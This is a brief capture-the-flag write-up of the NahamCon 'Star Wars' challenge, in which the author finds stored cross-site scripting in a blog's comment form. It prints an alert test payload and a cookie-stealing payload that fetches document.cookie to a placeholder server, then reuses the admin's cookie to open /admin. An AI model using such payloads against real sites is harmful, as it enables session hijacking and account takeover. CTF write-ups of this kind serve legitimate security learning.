Nahamcon - Star Wars
18/06/2023Who can do a ctf without a blog containing xss 🧐 ?
- Author : probably John Hammond but I can't remember
- Difficulty : easy
- Description : If you love Star Wars as much as I do you need to check out this blog!
For that challenge, we have a lovely blog about star wars 🛸.
We can see that we have a post and we can post comments on that post. Let's try an xss :
Yay 🎉, with a simple <img src="x" onerror="alert(0)" /> we get the alert. We can also see a small popup telling us that the admin will review our comment soon.
Well, let's make a request to fetch the cookies and wait for the admin to see our comment.
<img src="x" onerror="fetch('https://server.url/?c='+document.cookie)"/>
Now that we have the cookies, lets replace them and visit /admin 🤓.
